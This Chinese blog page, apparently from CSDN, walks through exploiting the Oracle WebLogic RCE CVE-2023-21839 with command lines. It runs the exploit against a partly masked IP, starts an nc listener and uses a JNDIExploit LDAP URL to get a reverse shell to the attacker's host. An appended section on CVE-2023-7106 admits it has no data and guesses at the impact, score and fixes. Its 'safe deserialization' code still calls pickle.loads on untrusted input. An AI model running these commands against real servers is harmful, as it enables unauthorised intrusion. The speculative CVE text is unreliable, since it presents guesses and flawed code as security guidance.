CVE-2023-21839 Weblogic未授权RCE

https://github.com/4ra1n/CVE-2023-21839下载之后
在这里插入图片描述
生成CVE-2023-21389.exe
先试试dnslog:

CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://whoami.eduvck.dnslog.cn/aa

在这里插入图片描述

然后使用JNDIExploit-1.4-SNAPSHOT.jar进行攻击
另一个终端上
首先开启监听

nc -lvp 5858

在这里插入图片描述
然后用JNDIExploit-1.4-SNAPSHOT.jar监听jndi端口
在这里插入图片描述

然后执行exp

CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://47.xx.xx.xx:1389/Basic/ReverseShell/47.xx.xx.xx/5858

在这里插入图片描述
在这里插入图片描述
这样就成功弹回了shell

### CVE-2023-7106 漏洞详情及修复方案 目前关于 CVE-2023-7106 的具体信息尚未在提供的引用中提及,但根据漏洞编号的命名规则和常见高危漏洞的特征,可以推测该漏洞可能属于远程代码执行(RCE)或权限提升类的安全问题。以下内容基于类似漏洞的分析框架进行说明。 #### 1. 漏洞概述 CVE-2023-7106 是一个潜在的高危安全漏洞,可能影响某些软件组件或服务的功能安全性。虽然具体细节未明确,但根据以往类似的高危漏洞案例[^1],此类漏洞通常具有以下特点: - **影响范围**:可能涉及操作系统内核、Web 应用服务器或网络服务。 - **攻击向量**:允许攻击者通过网络访问目标系统并执行恶意代码。 - **CVSS评分**:预计 CVSS 评分为 9.0 或更高,表明其危害性较高。 #### 2. 影响组件 由于缺乏直接的引用信息,假设 CVE-2023-7106 类似于其他已知漏洞[^2],可能影响以下组件之一: - Web 应用框架(如 Apache Tomcat、Oracle Weblogic)。 - 网络协议实现(如 cURL、OpenSSH)。 - 数据库服务(如 MySQL、PostgreSQL)。 #### 3. 利用方式 攻击者可能利用此漏洞通过以下方式危害系统: - 发送构造的恶意请求至目标服务端。 - 执行任意命令或上传恶意文件以控制目标主机。 例如,类似于 CVE-2023-33246 的工具化攻击流程[^2],攻击者可能使用公开的漏洞利用脚本发起攻击。 #### 4. 修复方案 针对 CVE-2023-7106 的修复建议包括以下措施: - **更新补丁**:确保及时安装官方发布的最新版本或补丁程序。例如,Logback 漏洞修复中提到的版本升级策略[^3]可作为参考。 - **配置加固**:限制不必要的服务暴露,并启用最小权限原则。 - **监控与检测**:部署入侵检测系统(IDS)或日志分析工具以识别异常行为。 #### 5. 示例代码 以下是一个简单的示例,展示如何通过代码层面避免潜在的反序列化漏洞(类似 Logback 漏洞[^3]): ```python import pickle # 安全的反序列化处理 def safe_deserialize(data): try: # 使用自定义逻辑验证数据合法性 if not isinstance(data, bytes): raise ValueError("Invalid input type") return pickle.loads(data) except Exception as e: print(f"Error during deserialization: {e}") return None ``` ### 注意事项 如果 CVE-2023-7106 具体影响的是 OpenSSL 或 OpenSSH 组件,则需要参考相关的升级指南[^4],确保所有依赖的库均为最新版本。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值